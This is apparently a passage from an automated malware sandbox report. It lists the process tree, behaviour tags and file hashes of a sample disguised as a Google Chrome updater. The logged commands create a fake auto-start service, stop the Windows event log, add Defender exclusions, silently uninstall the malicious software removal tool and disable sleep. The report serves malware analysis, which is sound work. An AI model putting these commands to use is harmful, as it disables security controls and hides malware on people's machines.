- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:232
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:468
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:3848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:800
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:3936 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:660
-
-
-
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2128 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2152
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2260
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4148
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4788 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3636
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4556
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1344
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4692
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4944
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1668
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
16KB
MD564db36e39e3afbf53dc364446aa67df4
SHA1b796cf9db59bdfa4f813d134644298efd6811013
SHA256216232aa2a1bb17bafacf42bf201dd618cd074ea0f6cda78eef3a5d7c7bfab4c
SHA512258d17555b1972c19b21dfbbc324e8b2614819b18b5877a3932aa42028d38490efcd3f9da5554dbc80afd9eabd741934215b1075457e259ba8cb32bb59a3dc5a
-
Filesize
11KB
MD578bc10ef0270acdf864b2cf3619c21e7
SHA19b7608380d16a2f9ddf2ab75068543ae58a8834d
SHA2568b81847910451e2cc4cdc98e0d8593929575a7d5d48930ce44168e95e0c3c7f8
SHA5123c768b92daf87a709909aa70f6de41a23bae92dff06320635b383852f3724625cdbd1314de2bd89b10611a494a1318c38e750acb8334044b446b721415f61bff
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.3MB
MD53974c5d0b92366bbc9af950c8d7f898d
SHA11b141b9cced64d1b86cd9d3460062ee7ecd34357
SHA256c88dbfa8510ba03e204e2458434be95cb232f34a0b530a299ba6fdecd3c39820
SHA5126b786fcf6ad40c3f8007e55242db7794f640177f3394a49a3ac9dc3b6cf3588eefe8e3db8ed21d9fcc3962de50d48c6c28867ab92a7da324389e19b9642170fa
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62